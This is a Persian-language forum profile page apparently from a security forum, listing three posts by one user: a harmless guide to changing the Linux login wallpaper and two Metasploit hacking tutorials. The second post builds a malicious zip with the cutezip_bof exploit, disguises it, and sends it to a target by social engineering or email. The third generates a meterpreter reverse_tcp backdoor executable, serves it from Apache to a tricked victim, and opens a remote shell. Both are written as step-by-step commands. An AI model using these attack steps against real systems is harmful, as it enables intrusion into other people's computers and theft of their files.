Mahan.nofozi

کاربر تازه وارد
  • تعداد ارسال ها

    4
  • تاریخ عضویت

  • آخرین بازدید

3 دنبال کننده

درباره Mahan.nofozi

  • درجه
    کاربر اخراجی

Profile Information

  • جنسیت
    Not Telling

آخرین بازدید کنندگان نمایه

188 بازدید کننده نمایه
  1. با سلام . خب بدون مقدمه بریم سراغ اموزش خب ابتدا به مسیر زیر برید در لینوکس خودتون: computer>>file system>>usr>>>share>>images>>Desktop-base خوب عکس یا والپیپر مورد نظرمون رو اینجا کپی میکنیم و اسم اون رو هم باید کپی کنیم لازم میشهحالا به قسمت share بر میگردیم و وارد gdm میشیم سپس پوشه dconf رو انتخاب میکنیم . خوب حالا فایل 10-desktop-base-settings رو با leafpad باز میکنیم و گزینه دوم یعنی : picture-uri='file:///usr/share/images/desktop-base/535647.jpg' اینرو ویرایش میکنیم ، فقط قسمت اخرشو و به جای عکس پیش فرض اسم عکس خودمون رو میزاریمدر گزینه دومی هم میتونی سایز رو انتخاب کنیم با تشکر : ماهان (نفوذی)
  2. Mahan.nofozi

    در این نوع حمله ما با استفاده از متااسپلویت اقدام به ایجاد یک فایل ورد با پسوند zip میکنیم و سپس این فایل رو از طرق مختلف مثل ( مهندسی اجتماعی – چت – ایمیل و . . . ) به تارگت میدهیم . بعد از اجرا و باز کردن فایل توسط تاگت ما موتوانیم از سیستم قربانی دسترسی بگیریم . خوب بریم سراغ اموزش اصلی : تارکت :Wing FTP 4.3.8 سیستم عامل حمله : بک ترک 5 یا کالی سیستم عامل تارگت : ویندوز 7 گام اول :در ابتدا وارد بک ترک بشید و یه ترمینال جدید باز کنید و دستور Msfconsole رو بنویسید و اینتر کنید ( البته میتونید از Armitage هم استفاده کنید . تفاوتی نداره ) . گام دوم : حالا با استفاده از دستور use exploit/windows/fileformat/cutezip_bof وارد محیط اکسپلویت بشید . گام سوم : در اینجا کافیه یه show options بگیرید تا بهتون بگه چه مقادیری رو باید ست کنید گام چهارم : مقادیر زیر را عینا ست کنید در صورت اینکه مثلا مشکل پیش اومد خودتون بنویسید msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp msf exploit (cutezip_bof)>set lhost 192.168.1.2 msf exploit (cutezip_bof)>exploit در اینجا ایپی 192.168.1.2 همون ایپی هکر یا ایپی خودتون هست که باید جایگزین کنید . گام پنجم : بعد از اکسپلویت یک فایل با پسوند zip و نام msf در شاخه زیر ایجا میشود که باید این فایل رو تغییر نام بدید تا تارگت شک نکنه و متوجه حمله ما نشود . /root/.msf4/local/msf.zip و باعد با استفاده از دستورات زیر کامپیوتر خودمون رو اماده گرفتن اکسس از تارگت میکنیم . یه چیزی تو مایه های گوش ایستادن . use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.2 exploit در اخر هم فایل ایجاد شده در مرحله قبل را به هر طریقی که شده به تارگت میدیم تا اجرا کنه . ( چت – مهندسی اجتماعی – ایمیل و . . . ) . به محض باز کردن فایل توسط تارگت ما از سیستم تارگت شل میگیریم و میتونیم برای مرحله بعد حمله خودمون رو اماده کنیم . برای دسترسی به شل هم کافیه یک بار دستور Sessions -l رو وارد کنید . اگر شل گرفته باشید برای شما نشون میده . که یک ایدی هم داره سپس درستور Sessions -l رو به همراه ایدی وارد کنید تا به شل تارگت وصل بشید . به این ترتیب : با تشکر . شرکت امنیتی گاردایران ماهان (نفوذی) sessions -i ID
  3. Mahan.nofozi

    با سلام ماهان نفوذی هستم خب بدون مقدمه بریم سراغ اموزش 1.اول ویندوز کالی لینوکس خودتونو باز کنید 2.حالا متا اسپلویت را باز کنید . روش باز کردن : وارد ترمینال شده و msfconsole را تایپ کرده و اینتر کنید . کمی صبر کنید تا متااسپلویت باز شود. 3.خب حالا که متا اسپلویت بالا اومد این عبارت را تایپ کنید : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 X > Desktop/Guardiran.exe در این دستور آدرس آیپی 192.168.1.100 , آدرس آیپی سیستم کالی لینوکس بنده هست که من به صورت دستی آن را تعیین کرده ام . شما بایستی آدرس آیپی کالی خود را در این فرمان وارد کنید . اگر این آدرس را نمی دانید , با استفاده از دستور ifconfig درون خط فرمان این آیپی را بدست آورید و وارد دستور کنید . 4.حالا اگر دسکتاپ لینوکستونو ببینید متوجه ایجاد شدن فایلی به نام guardiran شده اید (نام اصلی این ابزار ایجاد شده بک دور به معنای در پشتی میباشد) 5.ک خط فرمان جدید در کالی باز کنید (متا اسپلوییت را نبندید چون هنوز باهاش کار داریم) . خوب حالا بایستی فایل بکدور را با ویندوز 7 به اشتراک بگذاریم به این منظور دستورات زیر را در خط فرمان وارد کنید . ابتدا با استفاده از دستور mkdir یک پوشه جدید با مسیر /var/www/share ایجاد می کنیم . سپس با استفاده از دستور chmod دسترسی این پوشه را به 755 تغییر می دهیم . سپس توسط دستور chown مالکیت پوشه را به www-data تغییر می دهیم تا توسط آپاچی قابل دسترسی باشد . در نهایت با استفاده از دستور ls -la تغییرات انجام شده را می بینیم . 6.. گام بعدی این است که سرویس آپاچی سرور را آغاز کنیم تا فایل از طریق این مسیر قابل دسترسی باشد : 7 . حالا برای اینکه فایل بکدور که در ابتدای درس ایجاد کردیم از طریق مسیر سرور آپاچی قابل دسترسی باشد , با استفاده از دستور cp آن را به مسیر /var/www/share/ کپی می کنیم 8. اکنون زمان آن رسیده که ویندوز 7 برویم و این فایل را دانلود کنید . در این حالت خودتان را به جای هکر یک قربانی فرض کنید که به هر شکل ممکنی گول خورده و این فایل را از طریق سرور دانلود می کند . به این منظور در ویندوز هفت یک مرورگر را باز کنید و به مسیر http://192.168.1.100/share/ بروید . بازهم لازم به ذکر است که این آدرس آیپی کالی لینوکس شماست و مسلما برای شما آدرس متفاوتی خواهد بود . 9.خب حالا این فایل بک دور را روی سیستم خود زخیره کنید 10. به کالی لینوکس و ابزار متا اسپلوییت باز گردید . دستور use exploit/multi/handler را وارد کنید تا ماژول handler فعال شود . برای استفاده از TCP معکوس دستور set payload windows/meterpreter/reverse_tcp را وارد کنید . برای تعیین آدرس آیپی که کانکشن معکوس ما را خواهد گرفت دستور set lhost 192.168.1.100 را وارد کنید (آدرس آیپی کالی است و واسه شما متفاوت است) . برای آغاز به کار ماژول handler دستور exploit -j -z رو وارد بکنید 11. خوب یکبار دیگر به ویندوز هفت قربانی عزیز باز گردیم . این بار فرض کنید که قربانی فریب خورده و فایل بکدور (که قبلا دانلود کرده بود) را بر روی سیستم خود اجرا می کند . شما این کار را به صورت دستی نجام بدید ینی خودتون اجراش کنید... 12.به کالی و ابزار متا اسپلوییت بر گردید و ببینید که در آخر خط فرمان یک پیام جدید ظاهر شده که معنی آن این است که یک نشست جدید در داخل ماشین ویندوز 7 ما با آدرس آیپی 192.168.1.90 در زمان مربوطه آغاز گردیده است . 13.. خوب شما برای تعامل با این نشست باز شده کافی است دستور sessions -I 1 را وارد کنید . ملاحظه می کنید که پیامی می دهد که تعامل با نشست شماره یک آغاز شد . 14. حالا برای مثال برای دسترسی به خط فرمان ویندوز 7 و دسترسی به فایل ها و پوشه ها دستور Shell را وارد کنید . ملاحظه می کنید که ما هم اکنون وارد مسیر خط فرمان ویندوز 7 شده ایم و به سیستم ویندوز 7 نفوذ کرده و به فایل های آن دسترسی داریم . 15.. باور ندارید دستور dir را وارد کنید تا لیست فایل های موجود در پوشه فعلی را به شما نشان دهد . هاهاهاهاهاها 16. اینجوری بود که شما عزیزان این ویندوز سونو هک کردیـــد با تشکر ماهان (نفوذی)